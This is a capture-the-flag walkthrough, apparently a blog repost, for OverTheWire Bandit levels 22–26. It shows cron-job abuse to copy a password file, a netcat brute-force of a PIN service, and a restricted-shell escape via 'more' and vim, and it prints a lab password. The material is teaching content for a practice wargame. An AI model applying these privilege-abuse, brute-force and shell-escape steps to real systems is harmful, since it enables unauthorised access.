Overthewire – Bandit Walkthrough (22-26)

Hello friends! Today we are continuing to solve Bandit’s levels from Level 22. If you haven’t seen the previous part. It is strongly recommended to view the previous Part 1 and part 2.

Level 22-23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Again, we need to change our present directory with ‘/etc/cron.d’. Let’s list it out the files, here we can see that, there is a file ‘cronjob_bandit23’. Read this file and we got the path of the bash script.

cd /etc/cron.d
ls -la
cat cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
echo I am user bandit23
echo I am user bandit23 | md5sum
echo I am user bandit23 | md5sum | cut -d ' ' -f 1

We’ll read this bash script and the code says that we need to input the username, here user is bandit23 because we need to find the password for bandit23. Just following the pattern of this script, we’ll be able to generate the path of password file.

cat /tmp/8ca419486bfbbc3663ea0fbe81326349

Now, we can read the password file using cat.

ssh bandit23@localhost

Level 23-24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Again, we’ll change our directory with ‘/etc/cron.d’. Let’s list out the files which are present in this directory. We found a file named ‘cronjob_bandit24’. Read this file and we found a bash script.

Let’s see what does it work?

cd /etc/cron.d
ls -la
cat cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh

We can say that, this file is executing and deleting all scripts which are present in ‘/var/spool/$myname’.

So, first make a directory in ‘/tmp’ and write a bash script using nano.

mkdir /tmp/Ignite123
cd /tmp/Ignite123
nano bandit24.sh

Here, I’m instructing that just read the file bandit24 which is present in the ‘/etc/bandit24’ directory and transfer it into ‘/tmp/Ignite123/level24’.

//CODE

#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /tmp/Ignite123/level24

‘>>’ redirects output to a file appending the redirected output at the end.

Now, change the permission then copy and paste this file to ‘/var/spool/bandit24’.

chmod 777 bandit24.sh
cp bandit24.sh /var/spool/bandit24/
chmod 777 /tmp/Ignite123

Wait for a minute so that our script get execute and gives us a result. List the files and we will see the file name ‘level24’. Read the file using cat.

 

ls
cat level24

The above password can be used to connect bandit24.

ssh bandit24@localhost

Level 24-25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Here, I tried to see that how the things are working?

nc localhost 30002
cd /tmp/Ignite123
nano brute.sh

We can see that after single space we need to give the 4-digit pincode.

So, We need to write a bash script that brute force the pincode.

Same as previous way, create a new directory and write a bash script using nano.

//Code

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for i in {0..9}{0..9}{0..9}{0..9}
do
        echo $passwd' '$i >> output.txt
done

 

In script, we need to use for loop so that all the 4 places and all the possible combinations can be create on each place.

Change the permission and execute it.

chmod brute.sh

As we can see that that output.txt named file and it contains all the possible 4-digit combinations.

./brute.sh          
ls -la

 

Now, we just use the output file with netcat and produce the ouput in result.txt file.

Sort the content of result file and find the uniq text.

Hurray, we got the password for bandit25.

cat output.txt | nc localhost 30002 >> result.txt
sort result.txt | uniq -u

The above password can be used to connect bandit25.

ssh bandit25@localhost

 

Level 25-26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

First list out the file, it’s our first step when we don’t know how to proceed .

Try to connect connect bandit26 using private key file.

ls –la
ssh -i bandit26.sshkey bandit26@localhost

Alas!!! The connection get terminated.

According to my experience, I go into ‘/etc/passwd’ file.

cat /etc/passwd

/etc/passwd file is used to keep track of every registered user that has access to a system.

Here, we can see that there is a file in the /use/bin.

Just read this file and we can see that there is a script which is talking about more.

cat /usr/bin/showtext

Let’s know about more.

man more

To activate ‘more’, we just need to reduce the size of terminal.

Let’s try to connect again and make sure you have reduced the size of the terminal.

ssh -i bandit26.sshkey bandit26@localhost

Press v

Here, we can see that ‘More’ is activated. Just press ‘v’ to enter in the vim mode.

Type these commands to gain shell.

:set shell=/bin/bash

:shell

ls –la
cat README.txt

Author: SOURABH is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Overthewire – Bandit Walkthrough (22-26) appeared first on Hacking Articles.

from Hacking Articles https://ift.tt/2KuprF5